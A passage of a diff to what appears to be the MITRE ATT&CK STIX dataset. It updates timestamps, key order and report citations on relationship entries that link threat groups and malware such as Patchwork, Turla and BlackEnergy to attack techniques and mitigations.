"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.376Z",
+ "modified": "2020-05-18T17:29:30.990Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -34485,12 +35513,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279"
},
{
"id": "relationship--8d7c04bb-ed5b-4339-a115-62089ea6711b",
@@ -34502,7 +35530,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925",
"type": "relationship",
- "modified": "2019-10-11T15:20:53.974Z",
+ "modified": "2020-07-14T19:38:14.416Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -34711,7 +35739,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--c4ad009b-6e13-4419-8d21-918a1652de02",
"type": "relationship",
- "modified": "2020-03-30T13:45:24.452Z",
+ "modified": "2020-07-06T18:49:35.880Z",
"created": "2017-05-31T21:33:27.021Z"
},
{
@@ -35138,7 +36166,7 @@
{
"id": "relationship--47f521b8-37e4-489d-b6eb-25f35de80aae",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has downloaded additional code and files from servers onto victims.(Citation: Unit 42 Magic Hound Feb 2017)",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has downloaded additional code and files from servers onto victims.(Citation: Unit 42 Magic Hound Feb 2017) [Magic Hound](https://attack.mitre.org/groups/G0059) used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.(Citation: Check Point Rocket Kitten)(Citation: Check Point Rocket Kitten)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -35147,13 +36175,23 @@
"source_name": "Unit 42 Magic Hound Feb 2017",
"description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+ },
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ },
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
}
],
"source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-09-09T19:21:42.183Z",
+ "modified": "2020-07-04T22:55:43.533Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -35300,7 +36338,7 @@
{
"id": "relationship--74316a28-d1a6-40b8-8c49-836f06e90e02",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Patchwork](https://attack.mitre.org/groups/G0040) uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: Symantec Patchwork)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)",
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.(Citation: Cymmetria Patchwork)(Citation: Securelist Dropping Elephant)(Citation: Symantec Patchwork)(Citation: PaloAlto Patchwork Mar 2018)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -35321,26 +36359,31 @@
"source_name": "Symantec Patchwork"
},
{
- "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
+ "source_name": "PaloAlto Patchwork Mar 2018",
"description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.",
- "source_name": "PaloAlto Patchwork Mar 2018"
+ "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
},
{
- "source_name": "Volexity Patchwork June 2018",
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
- "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+ "source_name": "Volexity Patchwork June 2018"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"type": "relationship",
- "modified": "2020-03-19T19:58:57.951Z",
+ "modified": "2020-06-26T17:46:11.716Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -35682,7 +36725,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -35690,7 +36733,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.257Z",
+ "modified": "2020-06-22T17:54:15.482Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -35841,16 +36884,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.633Z",
+ "modified": "2020-06-02T16:14:00.331Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -36322,7 +37365,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -36331,7 +37374,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.139Z",
+ "modified": "2020-04-16T19:41:40.501Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -36390,16 +37433,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.549Z",
+ "modified": "2020-04-21T23:09:31.055Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -37077,16 +38120,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.018Z",
+ "modified": "2020-05-14T15:14:33.562Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -37302,7 +38344,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3",
"type": "relationship",
- "modified": "2020-02-05T14:15:23.266Z",
+ "modified": "2020-06-20T22:45:46.663Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -37356,16 +38398,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-19T19:21:27.669Z",
+ "modified": "2020-05-12T22:13:16.672Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -37820,7 +38862,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
"type": "relationship",
- "modified": "2019-07-25T12:33:12.873Z",
+ "modified": "2020-07-14T19:40:47.738Z",
"created": "2017-05-31T21:33:27.030Z"
},
{
@@ -38598,7 +39640,7 @@
{
"id": "relationship--c18652f6-e25c-4e01-bec2-04204a50cf23",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\\, D:\\, E:\\ and, F:\\ drives using [PowerShell](https://attack.mitre.org/techniques/T1086) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\\, D:\\, E:\\ and, F:\\ drives using [PowerShell](https://attack.mitre.org/techniques/T1059/001) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -38613,7 +39655,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2019-04-22T22:36:52.892Z",
+ "modified": "2020-03-31T22:21:47.653Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -39027,27 +40069,6 @@
"modified": "2019-08-20T13:08:13.416Z",
"created": "2017-05-31T21:33:27.036Z"
},
- {
- "id": "relationship--79d12bfb-6458-472f-85fc-4a8403956f9a",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) created several .LNK files on the victim's machine.(Citation: FireEye FIN7 Aug 2018)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
- "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
- "source_name": "FireEye FIN7 Aug 2018"
- }
- ],
- "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
- "type": "relationship",
- "modified": "2019-06-30T23:13:18.303Z",
- "created": "2018-10-17T00:14:20.652Z"
- },
{
"id": "relationship--1fda6ff7-a344-4bc3-b545-4083cc15290d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -39424,12 +40445,12 @@
"url": "http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html"
}
],
- "source_ref": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--e066bf86-9cfb-407a-9d25-26fd5d91e360",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--69f45e5e-2ebe-4cce-a4cd-e1db67bdff1a",
@@ -39445,12 +40466,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830"
},
{
"id": "relationship--c334b4c6-43f1-4452-8a1f-3d056fba9ac0",
@@ -39487,12 +40508,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--58f6b7ce-c0d0-4a54-b60d-1c39d6204796",
@@ -39779,22 +40800,27 @@
{
"id": "relationship--36112f24-7814-4c75-b5b7-a1205bb28b68",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.618Z",
+ "modified": "2020-06-22T17:55:32.020Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -40824,16 +41850,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.864Z",
+ "modified": "2020-05-12T22:13:16.669Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -40888,7 +41914,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
- "modified": "2020-03-14T18:19:14.980Z",
+ "modified": "2020-07-06T17:54:28.207Z",
"created": "2017-05-31T21:33:27.021Z"
},
{
@@ -40920,7 +41946,7 @@
{
"id": "relationship--fa6292a2-c184-4bc9-a37f-0c1ac61e1135",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, and in the Program Files directory.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also searched for files matching the lPH*.dll pattern.(Citation: ESET Turla PowerShell May 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also searched for files matching the lPH*.dll pattern.(Citation: ESET Turla PowerShell May 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -40931,16 +41957,21 @@
"source_name": "Kaspersky Turla"
},
{
- "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.",
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "ESET Turla PowerShell May 2019",
"url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
- "source_name": "ESET Turla PowerShell May 2019"
+ "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.772Z",
+ "modified": "2020-06-29T03:33:39.232Z",
"created": "2017-05-31T21:33:27.045Z"
},
{
@@ -41308,7 +42339,7 @@
{
"id": "relationship--d5166d3e-246b-473c-9ff0-c5cc97dd91de",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)",
+ "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)(Citation: ESET BlackEnergy Jan 2016)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -41317,13 +42348,18 @@
"source_name": "Securelist BlackEnergy Feb 2015",
"description": "Baumgartner, K. and Garnaeva, M.. (2015, February 17). BE2 extraordinary plugins, Siemens targeting, dev fails. Retrieved March 24, 2016.",
"url": "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/"
+ },
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.628Z",
+ "modified": "2020-06-10T21:56:44.790Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -41517,12 +42553,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104"
},
{
"id": "relationship--74c1fa45-5ac3-47a0-a442-2cc5e89f7b4c",
@@ -41700,7 +42736,7 @@
{
"id": "relationship--2d840d1b-28d7-4387-86fd-6d3df8650171",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a tool to capture screenshots.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -41709,13 +42745,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.159Z",
+ "modified": "2020-06-24T01:27:31.923Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -41801,7 +42842,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -41809,7 +42850,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-19T19:43:24.336Z",
+ "modified": "2020-06-22T17:54:15.495Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -41878,22 +42919,27 @@
{
"id": "relationship--c839344c-a96d-412f-bded-5ac7c8fd446a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can download additional files.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.866Z",
+ "modified": "2020-06-16T20:51:13.406Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -42088,22 +43134,26 @@
{
"id": "relationship--f33725f4-cce5-4868-b494-d73419c76bdf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
